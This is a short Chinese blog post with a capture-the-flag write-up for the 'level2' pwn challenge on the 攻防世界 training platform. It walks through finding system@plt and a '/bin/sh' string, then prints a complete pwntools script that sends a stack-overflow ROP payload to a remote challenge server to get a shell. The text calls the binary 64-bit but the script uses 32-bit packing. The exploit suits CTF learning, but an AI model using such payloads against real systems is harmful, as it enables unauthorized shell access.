美文网首页
level2攻防世界pwn

level2攻防世界pwn

作者: 杰_74 | 来源:发表于2019-08-09 10:31 被阅读0次

checksec后试运行


放入64位ida



典型栈溢出

发现system,但参数不对,那我们shift+F12查看字符串,发现binsh,地址为0x0804A024


system在plt的地址为0x08048320

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',31028)

system_plt = 0x08048320
binsh = 0x0804A024

payload = ''
payload += 'A'*0x88
payload += p32(0)
payload += p32(system_plt)
payload += p32(0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()
成功

相关文章

  • level2攻防世界pwn

    checksec后试运行 放入64位ida 发现system,但参数不对,那我们shift+F12查看字符串,发现...

  • 2019-05-30 新手练习区完结

    至此攻防世界的pwn新手练习区完结了

  • hello_pwn攻防世界pwn

    checksec然后试运行 放入64位ida,看看main函数 点击read函数里的unk_601068,再点击i...

  • 攻防世界 Pwn wp

    0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...

  • 攻防世界新手练习pwn

    0x00 get_shell 0x01 CGfsb 首先检查保护 nc连接输入信息为aaaa加很多个控制字符发现p...

  • 攻防世界高手进阶pwn

    歇了很长一段时间,终于开始了我的攻防世界pwn之路。立一个flag:每日一题,只能多不能少。 0x00 dice_...

  • pwn — level2

    Level2 拿到题目本能就check一下啦 发现又是一题只开NX的题目 拖进ida里看一下它的main函数 我们...

  • level3攻防世界pwn

    checksec level3./level3 ida,无system无binsh,要通过泄露write函数来泄露...

  • level0攻防世界pwn

    checksec然后试运行 放入64位IDA,F5大法 发现callsystem函数 找到callsystem的地...

  • cgpwn2攻防世界pwn

    checksec后试运行,有两个输入 32位ida 点进去hello() 可以利用fgets和gets栈溢出 发现...

网友评论

      本文标题:level2攻防世界pwn

      本文链接:https://www.haomeiwen.com/subject/epdcjctx.html